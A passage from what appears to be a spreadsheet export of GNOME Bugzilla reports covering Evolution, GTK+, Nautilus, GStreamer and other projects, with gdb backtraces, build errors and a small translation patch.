X server driving the X process up to 100% CPU utilization for several
seconds.  The window manager (sawfish in my case) also becomes generally
unresponsive while this is happening failing to respond to mouse motion
that ought to cause window focus changes.  The title bar of the main shell
window can be seen to flicker while this is happening as the X server and
window manager try to keep up.
A bit of gdb lovin' reveals that the icon changes are taking place during
folder discovery once for each folder.  The following is a representative
example stack trace of one such change during discovery of my sensors
IMAP folder:
    #0  gnome_window_icon_set_from_default (w=0x80e92b0)
	at gnome-window-icon.c:194
    #1  0x080643b9 in update_for_current_uri (shell_view=0x80e92b0)
	at e-shell-view.c:1423
    #2  0x40467d6d in gtk_marshal_NONE__POINTER (object=0x80e06a0 
	func=0x8063adc  func_data=0x80e92b0 
	args=0xbfffecf0) at gtkmarshal.c:193
    #3  0x4049756a in gtk_handlers_run (handlers=0x808b8c0 
	signal=0xbfffec90 object=0x80e06a0 params=0xbfffecf0 after=0)
	at gtksignal.c:1917
    #4  0x404969bb in gtk_signal_real_emit (object=0x80e06a0 
	signal_id=109 params=0xbfffecf0) at gtksignal.c:1477
    #5  0x40494a30 in gtk_signal_emit (object=0x80e06a0 signal_id=109)
	at gtksignal.c:552
    #6  0x0806f08c in storage_updated_folder_cb (storage=0x80f6878 
	path=0x816bab8 /sensors data=0x80e06a0) at e-storage-set.c:193
    #7  0x40467d6d in gtk_marshal_NONE__POINTER (object=0x80f6878 
	func=0x806f02c  func_data=0x80e06a0 
	args=0xbffff0b0) at gtkmarshal.c:193
    #8  0x4049756a in gtk_handlers_run (handlers=0x808bc20 
	signal=0xbffff050 object=0x80f6878 params=0xbffff0b0 after=0)
	at gtksignal.c:1917
    #9  0x404969bb in gtk_signal_real_emit (object=0x80f6878 
	signal_id=112 params=0xbffff0b0) at gtksignal.c:1477
    #10 0x40494a30 in gtk_signal_emit (object=0x80f6878 signal_id=112)
	at gtksignal.c:552
    #11 0x08070348 in folder_changed_cb (folder=0x816bc98 data=0x80f6878)
	at e-storage.c:106
    #12 0x080712d1 in e_storage_new_folder (storage=0x80f6878 
	path=0x816bd9c /sensors e_folder=0x816bc98) at e-storage.c:580
    #13 0x08056bda in impl_StorageListener_new_folder (servant=0x80f69e0 
	path=0x816bd9c /sensors folder=0xbffff3f0 ev=0xbffff460)
	at e-corba-storage.c:115
    #14 0x400388b5 in
_ORBIT_skel_GNOME_Evolution_StorageListener_notifyFolderCreated
(_ORBIT_servant=0x80f69e0 _ORBIT_recv_buffer=0x80ddf78 
	ev=0xbffff460 
	_impl_notifyFolderCreated=0x8056b88 ) at
Evolution-skels.c:3617
    #15 0x40755146 in ORBit_POA_handle_request (recv_buffer=0x80ddf78 
	poa=0x80daf28) at orbit_poa.c:507
    #16 0x40758193 in ORBit_handle_incoming_request (recv_buffer=0x80ddf78)
	at server.c:90
    #17 0x4075848b in ORBit_handle_incoming_message (recv_buffer=0x80ddf78)
	at server.c:160
    #18 0x4077209e in giop_recv_reply_buffer_use_multiple_2 (
	request_cnx=0x80df110 request_ids=0xbffff568 block_for_reply=1)
	at giop-msg-buffer.c:1026
    #19 0x4077215b in giop_recv_reply_buffer_use_2 (request_cnx=0x80df110 
	request_id=3221222832 block_for_reply=1) at giop-msg-buffer.c:1062
    #20 0x4068e675 in Bonobo_ConfigDatabase_getValue (_obj=0x80daae8 
	key=0x8166c90 /Shell/Views/0/ViewHPanedPosition 
	locale=0xbffffd75 en_US ev=0xbffff600)
	at Bonobo_Config-stubs.c:234
    #21 0x406991be in bonobo_config_get_value (db=0x80daae8 
	key=0x8166c90 /Shell/Views/0/ViewHPanedPosition 
	opt_tc=0x4076b0e0 opt_ev=0x0) at bonobo-config-database.c:622
    #22 0x40698c49 in bonobo_config_get_long (db=0x80daae8 
	key=0x8166c90 /Shell/Views/0/ViewHPanedPosition opt_ev=0x0)
	at bonobo-config-database.c:514
    #23 0x080660b0 in e_shell_view_load_settings (shell_view=0x80e92b0 
	view_num=0) at e-shell-view.c:2298
    #24 0x08067eda in e_shell_restore_from_settings (shell=0x80ddca0)
	at e-shell.c:1220
    #25 0x08072e8c in idle_cb (data=0x0) at main.c:162
    #26 0x40551ff0 in g_idle_dispatch (source_data=0x8072d6c 
	dispatch_time=0xbffff7a0 user_data=0x0) at gmain.c:1367
    #27 0x40551055 in g_main_dispatch (dispatch_time=0xbffff7a0)
	at gmain.c:656
    #28 0x40551659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
    #29 0x405517e8 in g_main_run (loop=0x80dc1f0) at gmain.c:935
    #30 0x4046665b in gtk_main () at gtkmain.c:524
    #31 0x406e7547 in bonobo_main () at bonobo-main.c:283
    #32 0x08073148 in main (argc=1 argv=0xbffff954) at main.c:266
    #33 0x40891e5e in __libc_start_main (main=0x8072fa8  argc=1 
	ubp_av=0xbffff954 init=0x8052f40  fini=0x8074320  
	rtld_fini=0x4000d3c4  stack_end=0xbffff94c)
	at ../sysdeps/generic/libc-start.c:129
Note that the icon changes are not truly changes in the sense that they
keep setting the icon back to the same image.  That suggests that a short
circuiting strategy may be appropriate: perhaps update_for_current_uri()
could detect that the desired icon is already in place and not redundantly
set it again.  Or perhaps icon changes should just be outright suppressed
during this initial startup phase.
Fixing this bug would significantly reduce my Evolution startup time.</t>
  </si>
  <si>
    <t>GNOME-MEDIA-75359</t>
  </si>
  <si>
    <t>CDDB goes funny</t>
  </si>
  <si>
    <t>When you change a CD CDDB info isn't updated.</t>
  </si>
  <si>
    <t>PLANNER-323083</t>
  </si>
  <si>
    <t>Day out by 1 in Gantt and Resource Usage</t>
  </si>
  <si>
    <t>When you zoom in on the Gantt or resource usage then the
&gt; actual day shown is out by 1 i.e. the week starts on Tuesday
&gt; and thus in my example the 4th of October 2005 is shown as 
&gt; a Wednesday and not the expected Tuesday.
Lincoln reported this to the list - I just entered for him.</t>
  </si>
  <si>
    <t>GTK+-496277</t>
  </si>
  <si>
    <t>GtkBuilder Invalid DTD</t>
  </si>
  <si>
    <t>Documentation 
Section: GtkBuilder -&gt; Description -&gt; GtkBuilder UI Definitions
&lt;!ATTLIST object     id             	    #REQUIRED
                     class          	    #IMPLIED
                     type-func      	    #IMPLIED
                     constructor    	    #IMPLIED &gt;
Correct version:
&lt;!ATTLIST object     id             	    #REQUIRED
                     class          	    #REQUIRED
                     type-func      	    #IMPLIED
                     constructor    	    #IMPLIED &gt;
Other information:</t>
  </si>
  <si>
    <t>SOUND-JUICER-162252</t>
  </si>
  <si>
    <t>Extract Re-read Select All Deselect All menu items must be disabled while ripping in progress.</t>
  </si>
  <si>
    <t>In Bug 113501 The main window widgets 'Extract' and 'Re-read' is disabled 
while ripping is in progress. 
The menu Items also need to be disabled to avoid confusion. 
Steps: 
1.Insert any audio CD 
2.Click 'Extract' 
3.Select 'CD' menu or 'Edit' menu. We can find that 'Extract' 'Re-read' 
'Select All' 'Deselect All' menuitems are all Enabled  
Problem: 
While ripping  
When the Extract menu item is selected the extraction is restarting. 
When the select all menu item is selected the Extract button is enabled. 
Expected: 
Selection should not be allowed when ripping is in progress so disable 
'Select-All' and 'Deselect All' menu item. 
'Extract' and 'Re-read' menuitem also should be disabled</t>
  </si>
  <si>
    <t>raj_madan</t>
  </si>
  <si>
    <t>GARNOME-130281</t>
  </si>
  <si>
    <t>mono/category.mk missing MASTER_SITE</t>
  </si>
  <si>
    <t>I had to add:
MASTER_SITES += http://www.go-mono.com/archive/
to mono/category.mk to make garnome find the mono tarballs.</t>
  </si>
  <si>
    <t>LIBGWEATHER-425778</t>
  </si>
  <si>
    <t>location&gt; Gadsden AL after I save it defaults to Gadsden AZ</t>
  </si>
  <si>
    <t>The bug has been opened on https://bugs.launchpad.net/ubuntu/+source/gnome-applets/+bug/97565
Binary package hint: gnome-applets
Set your location to Gadsden Alabama in your preferences. Hit save / close whatever the button says I forget.
Come back to preferences a while later Look at the location it says Gadsden Arizona.
I know it is actually using the Gadsden Arizona for the weather as well because Gadsden Arizona has no forecast Gadsden Alabama does. And when I click on it sometimes it shows the wrong temp and no forecast.
The locations have the same code</t>
  </si>
  <si>
    <t>GLIB-506374</t>
  </si>
  <si>
    <t>gmemoryinputstream api</t>
  </si>
  <si>
    <t>Looking at the gmemoryinputstream api I wonder if the following would not make more sense:
GInputStream *g_memory_input_stream_new (void)
void          g_memory_input_stream_add_data (const void     *data
                                              gssize          len
                                              GDestroyNotify *destroy)
This would a) allow the input stream to be based on more than one chunk of memory
and b) allow to use memory that must be freed by other means than g_free (e.g. munmap or g_slice_free)</t>
  </si>
  <si>
    <t>VINAGRE-617005</t>
  </si>
  <si>
    <t>contact name needs an explanation</t>
  </si>
  <si>
    <t>#: ../vinagre/vinagre-tube-handler.c:463
# c-format
msgid Impossible to get the contact name: %s
msgstr 
The phrase contact name is not well known. What is contact name? Is it a name of a person? Please add a translator comment with brief explanation. Thanks.</t>
  </si>
  <si>
    <t>GNOME-SHELL-746530</t>
  </si>
  <si>
    <t>Mouse Pointer does not change when focussing on different elements</t>
  </si>
  <si>
    <t>When mousing over an element such as alink a button or a cursor field the mouse cursor does nto change to the correct notifier.
Steps to Reproduce
1 - open a app of choice be it Settings a Web Browser here in this example Firefox and Gnome Default WEb Browser is used for reference.
2 - In the web browser go to a site with multiple elements. In this example use www.yahoo.com
3 - Focus your mouse pointer on the Activities button
5 - Zoom in
6- Move your mouse pointer around the screen focussing on the search box in yahoo or any links associated on the page.
Result
Mouse cursor is stuck on the previous focussed element in this case a mouse cursor and does not change according to the element focussed under the mouse cursor. In this example the mouse cursor does not change to a Insert Cursor or a Activate Link Cursor.
Workaround
ONce the element is lcoated say a insert field zoom out and zoom back in the cursor changes correctly.</t>
  </si>
  <si>
    <t>sunrisingsoul</t>
  </si>
  <si>
    <t>GIMP-131109</t>
  </si>
  <si>
    <t>EMX code should be dropped</t>
  </si>
  <si>
    <t>The EMX ifdefs presumably can be dropped from GIMP. I doubt anybody is 
going to port GTK2 and GIMP 2 to EMX.</t>
  </si>
  <si>
    <t>XCHAT-GNOME-406289</t>
  </si>
  <si>
    <t>intltool-* should be in DISTCLEANFILES not CLEANFILES</t>
  </si>
  <si>
    <t>Makefile.am sets CLEANFILES to intltool-{extractmergeupdate} however these are files required for the build and should be in DISTCLEANFILES instead. This is the cause of the following build failure:
http://jhbuild.bxlug.be/builds/2007-02-09-0003/logs/xchat-gnome/#build</t>
  </si>
  <si>
    <t>BUGZILLA.GNOME.ORG-528897</t>
  </si>
  <si>
    <t>Missing Classification for products in GNOME Devel Suite</t>
  </si>
  <si>
    <t>GNOME modules accerciser anjuta devhelp gdl glade-3 and gnome-build are usually grouped as Development Tools (like pessulus and sabayon are grouped as Admin Tools).
Could be good add a group in bugzilla Classification for them too instead listing under Other.</t>
  </si>
  <si>
    <t>ACCERCISER-433529</t>
  </si>
  <si>
    <t>Trunk build missing plugin and IPython windows</t>
  </si>
  <si>
    <t>This is trunk FTP 0.1.1 is OK (note trunk and accerciser versions not available in the bug template)
I followed the instructions on the wiki to get build and install accerciser and when run only the top left tree window is available. All the plugins are enabled and I even tried disabling and re-enabling them.
Note I had already installed 0.1.1 and over installed trunk. I can re-install and run 0.1.1 OK.</t>
  </si>
  <si>
    <t>EVOLUTION-349520</t>
  </si>
  <si>
    <t>Message Window Maximized state not saved</t>
  </si>
  <si>
    <t>If I open a mail in a new window and maximize it close the window and open a new window it isnt maximized. But it should imho.</t>
  </si>
  <si>
    <t>TEST-138780</t>
  </si>
  <si>
    <t>hot test action</t>
  </si>
  <si>
    <t>more testing</t>
  </si>
  <si>
    <t>GNOME-NETTOOL-336959</t>
  </si>
  <si>
    <t>gnome-doc-utils migration</t>
  </si>
  <si>
    <t>Page http://live.gnome.org/GnomeDocUtilsMigrationHowTo contains many good reasons to migrate help build system to use gnome-doc-utils. Please migrate.</t>
  </si>
  <si>
    <t>NAUTILUS-47387</t>
  </si>
  <si>
    <t>Font selection defaults to bold for some fonts</t>
  </si>
  <si>
    <t xml:space="preserve">In the Preferences dialog under Appearance on my system
after choosing adobe courier as the font the style choices
list Normal Italic Bold and Bold Italic each four times
in a row.  Other fonts seem to list the styles only once each.
In addition most fonts default to Normal or Book for the
style but Alexandria Arial Courier New Micro Extend
Prelude Times New Roman Verdana and grarial default to
Bold instead.
------- Additional Comments From darin@bentspoon.com 2001-03-05 13:21:26 ----
The multiple styles bug is already reported -- it's bug 47348 -- so lets use this
for the defaults to bold part only.
------- Additional Comments From sullivan@eazel.com 2001-03-05 13:31:56 ----
The style that is chosen by default for any given family is the first style
listed in the menu. So this bug report morphs into Some fonts list styles in
non-standard order.
The code that constructs the list of styles that is later turned into the menu
makes no attempt to order the styles it just appends the new style to the end
of the current list of styles for this font.
So there are two ways I can imagine to fix this bug:
(1) Make the code that creates or iterates the global font table ensure some
standard ordering of styles.
(2) Make the code that creates the style list for each font ensure some standard
ordering of styles.
I think (2) is probably the right level at which to address this. One issue is
that the styles are really just strings not members of an ENUM that are
guaranteed to match some pre-existing notion. So we'd have to do string compares
and put any unmatching ones at the end of the list.
An ordering that makes sense to me is:
Normal
Book
Bold
Italic
Oblique
Don: Is this worth addressing for 1.0? (I think it's fine not to personally.)
Ramiro: Does my analysis/suggestion make sense? I'd be happy to implement this
if so but I'm assigning it to you so that you can review the suggestion.
------- Additional Comments From don@eazel.com 2001-03-05 15:18:49 ----
I don't think this is a 1.0 blocker.
------- Additional Comments From ramiro@fateware.com 2001-03-12 03:10:11 ----
Sullivan yes you described the problem perfectly.  We just need to sort the
font style list using the criteria that normal is always first.
Exactly how everything after normal is sorted is a little tricky but not
impossible to get right since the number of styles is finite (or at least well
known)
------- Additional Comments From ramiro@fateware.com 2001-03-20 20:42:39 ----
Fixed.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 21:06 -------
The original reporter (eric@eazel.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>ORCA-423198</t>
  </si>
  <si>
    <t>[pending] Orca should not speak text repeatedly when moving around in a text entry area on a web page</t>
  </si>
  <si>
    <t>1.  attempt to file a bug at bugzilla.gnome.org. 
2.  type several lines of text in the description 
3.  CTRL+right and left arrow between the words in this text.  You will hear text after you hear each word.
4.  Up and down between the lines in the text.  You will hear text after each line.  
Because we have already been alerted that we have entered a text area upon entry we don't need to hear it over and over again.  We should treat this text similar to the text in gedit.</t>
  </si>
  <si>
    <t>GNOME-APPLETS-339255</t>
  </si>
  <si>
    <t>Multi-line ALL_LINGUAS breaks build</t>
  </si>
  <si>
    <t>When trying to build gnome-applets from CVS HEAD using jhbuild configure failed. The symptom is the following:
configure: creating ./config.status
config.status: creating Makefile
sed: file ./confstatVc2230/subs-2.sed line 33: unterminated `s' command
sed: couldn't write 50 items to stdout: Broken pipe
(Actual output taken from another package that failed similarly).
The problem appears that multiple lines are assigned to ALL_LINGUAS in configure.in. config.status then generates a sed script containing the substitutions and sed breaks because there's a multiline string in there that's not marked as such.
In my view this is an autoconf bug but it's easily preventable so why not save everyone the pain?
hpj [~] /opt/gnome/bin/autoconf --version
autoconf (GNU Autoconf) 2.59
hpj [~] /opt/gnome/bin/automake --version
automake (GNU automake) 1.9.6
hpj [~] /opt/gnome/bin/libtoolize --version
libtoolize (GNU libtool) 1.5.22
hpj [~] /opt/gnome/bin/intltoolize --version
intltoolize (GNU intltool) 0.34.90</t>
  </si>
  <si>
    <t>EVOLUTION-218296</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 1.0 []
Synopsis: Crash at startup
Bugzilla-Product: Evolution
Bugzilla-Component: Shell
Description:
The progeam crashs at  thenend of the new user wizard
Debugging Information:
(no debugging symbols found)...0xeeab0b0 in wait4 () at soinit.c:64
#0  0xeeab0b0 in wait4 () at soinit.c:64
#1  0xeeab064 in __libc_waitpid (pid=512 stat_loc=0x7ffff438 options=0)
    at ../sysdeps/unix/sysv/linux/waitpid.c:26
#2  0xfc81e38 in waitpid (pid=1139 stat_loc=0x7ffff438 options=0)
    at wrapsyscall.c:173
#3  0xf3c9db0 in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0xfc7f0b4 in pthread_sighandler (signo=11 ctx=0x7ffff4c0) at signals.c:97
#5  
#6  0x1004a0f8 in e_map_point_set_color_rgba ()
#7  0x10045f74 in e_timezone_dialog_new ()
#8  0xef59068 in g_timeout_dispatch (source_data=0x101780a0 
    dispatch_time=0x7ffff818 user_data=0xff) at gmain.c:1302
#9  0xef57db4 in g_main_dispatch (dispatch_time=0x7ffff818) at gmain.c:656
#10 0xef58420 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#11 0xef58544 in g_main_iteration (block=269484992) at gmain.c:907
#12 0xf1c8598 in gtk_main_iteration () at gtkmain.c:603
#13 0x10031c14 in e_shell_create_view ()
#14 0x1002fd04 in e_shell_view_get_type ()
#15 0xffc7440 in GNOME_Evolution_Shell_createNewView (_obj=0x100b189c 
    uri=0x100580a8 evolution:/summary ev=0x7ffff958)
    at Evolution-stubs.c:9715
#16 0x1002fe18 in e_shell_view_get_type ()
#17 0xffc76b8 in GNOME_Evolution_Shell_handleURI (_obj=0x100b1af8 
    uri=0x100580a8 evolution:/summary ev=0x7ffff958)
    at Evolution-stubs.c:9853
#18 0x10045204 in evolution_storage_set_view_factory_new_view ()
#19 0xef591dc in g_idle_dispatch (source_data=0x10045f74 
    dispatch_time=0x10131878 user_data=0xff) at gmain.c:1367
#20 0xef57db4 in g_main_dispatch (dispatch_time=0x7ffff9f8) at gmain.c:656
#21 0xef58420 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#22 0xef58664 in g_main_run (loop=0x100ad990) at gmain.c:935
#23 0xf1c8270 in gtk_main () at gtkmain.c:524
#24 0xf8ddd7c in bonobo_main () at bonobo-main.c:283
#25 0x100454ec in main ()
#26 0xee230f8 in __libc_start_main (argc=1 ubp_av=0x7ffffba4 ubp_ev=0xff 
    auxvec=0x7ffffc2c rtld_fini=0x101003c0 stinfo=0x1004ea90 
    stack_on_entry=0x1) at ../sysdeps/powerpc/elf/libc-start.c:119
#0  0xeeab0b0 in wait4 () at soinit.c:64
64	in soinit.c
__CTOR_LIST__ = {0xffffffff}
__DTOR_LIST__ = {0xffffffff}
__EH_FRAME_BEGIN__ = 0xef25c64 
#1  0xeeab064 in __libc_waitpid (pid=512 stat_loc=0x7ffff438 options=0)
    at ../sysdeps/unix/sysv/linux/waitpid.c:26
No locals.
#2  0xfc81e38 in waitpid (pid=1139 stat_loc=0x7ffff438 options=0)
    at wrapsyscall.c:173
result = 0
oldtype = 0
#3  0xf3c9db0 in gnome_segv_handle (signum=11) at gnome-init.c:659
estatus = 2147480520
in_segv = 1
pid = 512
#4  0xfc7f0b4 in pthread_sighandler (signo=11 ctx=0x7ffff4c0) at signals.c:97
self = 0xfc97f80
in_sighandler = 0x0
#5  
No symbol table info available.
#6  0x1004a0f8 in e_map_point_set_color_rgba ()
No symbol table info available.
#7  0x10045f74 in e_timezone_dialog_new ()
No symbol table info available.
Unknown reporter: fledwidge@ns2.teraglobal.com changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>fledwidge</t>
  </si>
  <si>
    <t>GLADE-312177</t>
  </si>
  <si>
    <t>Document libgladeui</t>
  </si>
  <si>
    <t>The libgladeui (glade-3 core) already has alot of 
documentation this is usefull to plugin and application
developers (like gnome widgets package or anjuta application
for instance).
We just need to get it generated right with some page headers/
descriptions and maybe put it on the web somewhere...</t>
  </si>
  <si>
    <t>GSTREAMER-736017</t>
  </si>
  <si>
    <t>Sequence number is not monotonic after PAUSE command</t>
  </si>
  <si>
    <t>While using RTSP-server and g726payloader in gstreamer sequence number is not monotonic while going from pause to play again.
According to the RFC both RTP sequence numbers and RTP timestamps MUST be continuous and monotonic across jumps of NPT.
So while going from PAUSE to PLAY on live media the sequence number generated by the basepayloader is random. So the sequence number is not monotonically increasing from previous play request to the next play request.
This issue is combination of both rtsp-server and basepayloader issue. In RTSP server for pause the pipeline is set to NULL state and in basepayloader the sequence number is generated randomly everytime it change state from READY TO PAUSE.</t>
  </si>
  <si>
    <t>panda_srimanta</t>
  </si>
  <si>
    <t>DIA-333193</t>
  </si>
  <si>
    <t>TeX PSTricks export</t>
  </si>
  <si>
    <t>Please describe the problem:
The TeX export option does not yield feasible results. If just input command is
used in Latex lines and texts are displaced. If input is integrated to figure
enviroment export generates error  Something's wrong--perhaps a missing \item.
Steps to reproduce:
1. create diagram
2. export to TeX
3. include to your TeX document
Actual results:
Expected results:
Does this happen every time?
yes
Other information:
TeX export in former versions such as 0.94 were also buggy when used with the
\resizebox command of the latex graphicx package! However one was able to
overcome potential problems with the latex compiler e.g. by commenting the
definition of the scalebox command in graphics.sty.
I myself use windows miktex 2.4.1461 and up to date packages. Collegues using
linux platform experienced similar problems.</t>
  </si>
  <si>
    <t>jens.linden</t>
  </si>
  <si>
    <t>NETWORKMANAGER-744598</t>
  </si>
  <si>
    <t>Wi-Fi</t>
  </si>
  <si>
    <t>[review] dcbw/wifi-gdbus: port supplicant and wifi code to GDBus</t>
  </si>
  <si>
    <t>Port the supplicant and wifi code to GDBus.</t>
  </si>
  <si>
    <t>EVOLUTION-205457</t>
  </si>
  <si>
    <t>there is no way to turn off toolbar in the composer</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 0.11.99
Synopsis: there is no way to turn off toolbar in the composer
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
just about all the other evolution windows allow me to turn off the toolbar - cept the composer	
</t>
  </si>
  <si>
    <t>GNOME-PANEL-113381</t>
  </si>
  <si>
    <t>Use uppercase initial letter in gnome-panel message</t>
  </si>
  <si>
    <t>#: gnome-panel/panel-bindings.c:199
# c-format
msgid error getting value for '%s': %s
The initial letter should probably be uppercase here like in the other
error messages.</t>
  </si>
  <si>
    <t>EVOLUTION-350901</t>
  </si>
  <si>
    <t>Disable doesn't work for On This Computer</t>
  </si>
  <si>
    <t>Forwarding this bug from downstream.
Confirmed that it still exists in Evolution 2.7.91.
http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=201831
Description of problem:
Version-Release number of selected component (if applicable):
evolution-2.7.4-4
How reproducible:
always
Steps to Reproduce:
1. Launch Mail-Evolution
2. In Folder list right click On This Computer and select Disable
Actual results:
Nothing happens it doesn't work.
Expected results:
On This Computer should be disabled. Or if On This Computer could't be
disabled Disable shouldn't be activated in menu list.
Additional info:</t>
  </si>
  <si>
    <t>GTHUMB-316321</t>
  </si>
  <si>
    <t>2.6.7 image-&gt;resize  doesn't work correctrly</t>
  </si>
  <si>
    <t>Please describe the problem:
The Keep aspect ratio functionality is not working.
Steps to reproduce:
1. Open jpg image 577x640
2. Go to image-&gt;Resize dialog
3. Keep aspect ratio is selected High quality too
4. I lower the Width using the mouse with the down arrow (left the text field)
5. After the first click width=576 (as expected) Height=10000
scale ratio width=0.0998
scale ratio height=15.625
6. After the second click width=575 Height=1
scale ratio width=0.0997
scale ratio height=0.002
7. After the second click width=574 Height=10000
scale ratio width=0.0995
scale ratio height=15.625
8. And so on...
9. I also try to ednter constat in width text field equal to 500 i.e. width=500
and than the height=1
scale ratio width=0.867
scale ratio height=0.002
Actual results:
described above
Expected results:
you've got the point hopefully
Does this happen every time?
yes
Other information:
I'm using ubuntu hoary. I noticed this bug after installing ghtumb 2.6.7 from
source. I haven't remove the previous version installed by apt. Please gthumb is
not the same programme without resize function!</t>
  </si>
  <si>
    <t>kalifi</t>
  </si>
  <si>
    <t>GAL-201162</t>
  </si>
  <si>
    <t>dnd to shortcut bar is broken if etable is scrolled</t>
  </si>
  <si>
    <t>If i try to drag a folder in evo from the folder tree to the shortcut bar
and the shortcut bar is scrolled the wrong folder is dropped onto the 
shortcut bar.
The folder that gets dropped is the one that would be under the mouse if the
etable was not scrolled.</t>
  </si>
  <si>
    <t>NAUTILUS-CD-BURNER-119991</t>
  </si>
  <si>
    <t>It's not easy to find and start CD burning application</t>
  </si>
  <si>
    <t>There are usability problems with writing CDs in Gnome even n-c-b is
installed because going to burn:/// or choosing Go-&gt;CD Creator from
menu are not easy to found for most users :(
I think menu entry (.desktop file) CD burner should be added in
Accessories or System tools menu categories. When user press on CD burner 
nautilus-cd-burner should be lauched.
Then if there are no files in burn:/// user will see dialog:
You need to copy the files you want to write to CD to the CD Creator
window. Would you like to open it now? and 2 buttons Close and Open CD
Creator
I think this is user-friendly because from this dialog simple user got all
information how to write CD and then he can simply press Open CD Creator
button copies the files into the CD Creator window and press Write to CD
button.
If there already are files in burn:/// location then nautilus-cd-burner
command displays Write files to a CD recorder dialog. I think this is ok
but one more button Open CD Creator (or maybe it's can be named Show
files to be written) should be added to this dialog. If user press this
button then CD Creator window (nautilus with burn:/// locaton) is
displayed. I'm attaching screenshot of improved Write files to a CD
recorder dialog to this bug.
Btw when nautilus displays burn:/// location tittle of nautilus window
should be not burn:/// but CD Creator because simple users don't know
any burn:/// :)</t>
  </si>
  <si>
    <t>egle</t>
  </si>
  <si>
    <t>NAUTILUS-390055</t>
  </si>
  <si>
    <t>do not show file size in toolbar for computer:///</t>
  </si>
  <si>
    <t>Browse to computer:///.
Select any of the icons (removable drives Filesystem Network).  Look at the status bar.  Marvel at the stupidity of describing e.g. Network as 0 bytes.
gnome-vfs is not to blame the dentries don't have GNOME_VFS_FILE_INFO_FIELDS_SIZE set.</t>
  </si>
  <si>
    <t>EVINCE-309393</t>
  </si>
  <si>
    <t>Dual should place even pages at left and odd pages at right</t>
  </si>
  <si>
    <t>The Dual-mode shows odd pages to the left and even pages to the right. To
resemble a real spread it should instead place even pages to the left and odd
pages to the right. That would imply that the first page would always be a loner
at the top right which is fine with me though.</t>
  </si>
  <si>
    <t>gbz</t>
  </si>
  <si>
    <t>EVOLUTION-256184</t>
  </si>
  <si>
    <t>New/Task List doesn't close on Esc</t>
  </si>
  <si>
    <t>ditto</t>
  </si>
  <si>
    <t>HAMSTER-APPLET-531951</t>
  </si>
  <si>
    <t>Missing spanish locales</t>
  </si>
  <si>
    <t>On last version (r277) from http://projecthamster.googlecode.com/svn/trunk the 'es' locales are missing because they are not included on po/LINGUAS
I added it on and the app works fine in spanish. The patch is really simple but for make you easier your job :-)
--- po/LINGUAS	(revision 277)
+++ po/LINGUAS	(working copy)
@@ -13 +13 @@
 # Please keep this list sorted alphabetically.
 #
-lv sv
\ No newline at end of file
+lv sv es</t>
  </si>
  <si>
    <t>jojeda</t>
  </si>
  <si>
    <t>GNOME-MUD-116337</t>
  </si>
  <si>
    <t>can't handle telnet sequences split across read()s</t>
  </si>
  <si>
    <t>Since gnome-mud's telnet handling state is kept on the stack in
pre_process it gets destroyed when this function runs out of data.  So if
a telnet sequence is split across packets it will be handled incorrectly.
 It should keep all necessary state in CONNECTION_DATA.</t>
  </si>
  <si>
    <t>morwen</t>
  </si>
  <si>
    <t>GNOME-UTILS-104388</t>
  </si>
  <si>
    <t>Compiler error in version 2.2.0.1</t>
  </si>
  <si>
    <t>With GCC-3.2.1 I'm getting the following error when I try to compile
gnome-utils-2.2.0.1 ... gnome-utils-2.2.0 was fine.
gcc -DHAVE_CONFIG_H -I. -I. -I../.. -DGNOMELOCALEDIR=\/usr/share/locale\	
        -DGLADEDIR=\/usr/share/gnome-utils/glade\           	       
-DDATADIR=\/usr/share\			-DORBIT2=1 -pthread
-I/usr/include/libgnome-2.0 -I/usr/include/glib-2.0
-I/usr/lib/glib-2.0/include -I/usr/include/orbit-2.0
-I/usr/include/libbonobo-2.0 -I/usr/include/gconf/2
-I/usr/include/gnome-vfs-2.0 -I/usr/lib/gnome-vfs-2.0/include
-I/usr/include/linc-1.0 -I/usr/include/bonobo-activation-2.0
-I/usr/include/libgnomeui-2.0 -I/usr/include/libgnomecanvas-2.0
-I/usr/include/gtk-2.0 -I/usr/include/libart-2.0
-I/usr/include/libbonoboui-2.0 -I/usr/include/pango-1.0
-I/usr/include/freetype2 -I/usr/lib/gtk-2.0/include -I/usr/include/atk-1.0
-I/usr/X11R6/include -I/usr/include/libxml2      -g
-I/usr/include/libglade-2.0 -I/usr/include/gtk-2.0 -I/usr/include/libxml2
-I/usr/lib/gtk-2.0/include -I/usr/include/atk-1.0 -I/usr/include/pango-1.0
-I/usr/include/freetype2 -I/usr/X11R6/include -I/usr/include/glib-2.0
-I/usr/lib/glib-2.0/include   -c gfloppy.c
main.c: In function `on_format_button_clicked':
main.c:417: warning: assignment discards qualifiers from pointer target type
main.c: In function `main':
main.c:487: `icon_path' undeclared (first use in this function)
main.c:487: (Each undeclared identifier is reported only once
main.c:487: for each function it appears in.)
main.c:488: warning: passing arg 4 of `gnome_icon_theme_lookup_icon' from
incompatible pointer type
make[3]: *** [main.o] Error 1
Leaving directory
`/usr/src/gnome/gnome-utils-2.2.0.1/work/gnome-utils-2.2.0.1/gfloppy/src'</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-85233</t>
  </si>
  <si>
    <t>left-handed mouse checkbox can't handle other handed click.</t>
  </si>
  <si>
    <t>When I check Left-handed mouse checkbox 
desktop mouse property changes  instantly.
and I want to cancel checkbox but property
is set with left handed mouse so must left click.
However most people are confused.
right handed mouse users are used right-handed only.
(even if property changed)
so I propose Left-handed mouse check box can handle 
both of right and left click.</t>
  </si>
  <si>
    <t>LIBGDA-300592</t>
  </si>
  <si>
    <t>GdaXqlUpdate declaration is wrong</t>
  </si>
  <si>
    <t>From the ChangeLog in the patch:
* libgda/gda-xql-update.h: GdaXqlUpdate
  should contain an instance of the parent type
  (GdaXqlDml) not a pointer to one. This avoids
  glib warnings about the instance size.
This type has obviously not been used yet. In fact I have no idea whether any
of this Xql stuff is used. I recommend removing such cruft from libgda 2.0.</t>
  </si>
  <si>
    <t>GALEON-84681</t>
  </si>
  <si>
